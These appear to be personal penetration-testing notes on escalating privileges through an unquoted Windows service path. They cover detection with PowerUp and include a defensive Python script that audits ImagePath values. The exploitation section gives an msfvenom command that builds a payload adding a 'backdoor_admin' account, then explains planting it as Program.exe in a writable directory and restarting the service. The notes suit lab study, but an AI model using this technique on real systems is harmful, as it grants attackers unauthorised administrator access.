Unquoted Service Path
// Click the Start button --> search for "services" --> open the Services application.
// All installed services are listed here --> find the service you want to examine.
// Double-click the service and examine its "Path to executable":
C:\some path\some path2\vulnservice.exe
Note the space between the folder names --> "some path" is a single folder, but because the path is not wrapped in quotes, Windows has to guess where the executable name ends. It tries C:\some.exe first, then C:\some path\some.exe, and only then the intended C:\some path\some path2\vulnservice.exe.
So the path can be used in an unintended way.
It is only exploitable, however, if one of those intermediate directories is writable by us; if every directory on the path is properly ACLed, an unquoted path is a finding but not a privilege escalation.
to identify :
use https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
or do it manually (check each service's ImagePath and the ACLs of the directories along it).
Now transfer the script to the Windows machine and open PowerShell:
>>> Import-Module .\PowerUp.ps1
>>> Invoke-AllChecks # runs every PowerUp check; to look only for unquoted service paths run --> Get-UnquotedService
Now notice the unquoted service path.
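The same check done offline, as an added example that is not part of the original notes or of PowerUp: it reproduces the logic of Get-UnquotedService over constructed ImagePath strings (the kind of values you get from `sc qc` or the Services registry key) and returns, for each flagged service, the directories whose write ACLs an auditor must review.

```python
"""Audit service ImagePath values for the unquoted-path weakness.

Windows resolves an unquoted ImagePath with CreateProcess semantics: it
splits on spaces and probes "C:\some.exe", "C:\some path\some.exe", ...
before the intended binary. Every parent directory of those probe paths
must not be writable by standard users.
"""
import ntpath
import re

# Constructed samples (not from a real host), shaped like `sc qc` output.
SAMPLE_IMAGE_PATHS = {
    "vulnservice": r"C:\some path\some path2\vulnservice.exe",
    "vendorapp":   r"C:\Program Files\Vendor App\app.exe -service",
    "goodservice": r'"C:\some path\some path2\goodservice.exe" -arg',
    "nospace":     r"C:\Windows\system32\svchost.exe -k netsvcs",
    "driver":      r"%SystemRoot%\system32\drivers\foo.sys",
}


def exe_part(image_path):
    """Executable portion of an ImagePath (up to '.exe'), arguments dropped."""
    m = re.match(r"(.*?\.exe)(?=\s|$)", image_path.strip(), re.IGNORECASE)
    return m.group(1) if m else image_path.strip().split(" ")[0]


def is_unquoted_with_space(image_path):
    """True when the executable path is unquoted and contains a space."""
    if image_path.strip().startswith('"'):
        return False  # quoted paths are resolved unambiguously
    return " " in exe_part(image_path)


def lookup_candidates(image_path):
    """Paths Windows probes, in order, before reaching the real binary."""
    parts = exe_part(image_path).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def directories_to_audit(image_path):
    """Parent directories of the probe paths: check their ACLs for write access."""
    return [ntpath.dirname(c) for c in lookup_candidates(image_path)]


def audit(services):
    """Map each flagged service name to the directories needing ACL review."""
    return {name: directories_to_audit(path)
            for name, path in services.items() if is_unquoted_with_space(path)}


if __name__ == "__main__":
    for name, dirs in audit(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: review write ACLs on {dirs}")
```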
Go To Kali :
>>> msfvenom -p windows/adduser USER=backdoor_admin PASS=helloguys! -f exe > service.exe
Now transfer this payload to Windows and place it in the writable directory as discussed above.
E.g. for a path under C:\Program Files\ Windows first probes C:\Program.exe, so the payload would be named Program.exe and placed in C:\ (which only works if C:\ is writable).
Note : Don't forget to rename your payload as per your path.
Now go to Services (from the Start button) and restart the service. Don't worry if you don't have permission to do it: reboot the machine instead and the service will be started automatically.
after restarting / rebooting :
open cmd :
>>> net user
<you will have your user created>
so just logout and login again with new user(high privs)
note : while login may be you need to specify your username : Win10-1\<username>